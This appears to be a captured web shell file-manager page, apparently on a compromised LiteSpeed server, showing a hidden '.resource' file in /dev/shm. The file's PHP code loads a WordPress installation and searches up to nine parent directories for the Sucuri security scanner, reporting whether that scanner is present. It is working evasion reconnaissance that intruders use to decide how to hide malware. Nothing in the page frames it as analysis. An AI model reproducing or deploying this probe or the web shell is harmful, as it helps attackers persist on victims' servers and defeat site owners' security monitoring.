📁 File Manager Pro
v10.0.3 | PHP: 8.1.34
Server: LiteSpeed
2026-06-27 21:51:42
📂
/ (Root)
/
dev
/
shm
📍 /dev/shm
🔄 Refresh
✏️
Editing: .resource
Read Only
<?php check("/home/vrikdouo/tantava.in"); function check($r) { @include("{$r}/wp-load.php"); if (function_exists('get_option')) { $plugins = @get_option('active_plugins'); if (@in_array('sucuri-scanner/sucuri.php', $plugins)) { die('!ssfound!'); } } else { if (file_exists("{$r}/wp-content/plugins/sucuri-scanner/sucuri.php")) { die('!ssfound!'); } } } for ($i = 0; $i <= 9; $i++) { $r = realpath(dirname(__FILE__) . str_repeat('/..', $i)); check($r); } die('!ssnotfound!');
💾 Save Changes
❌ Cancel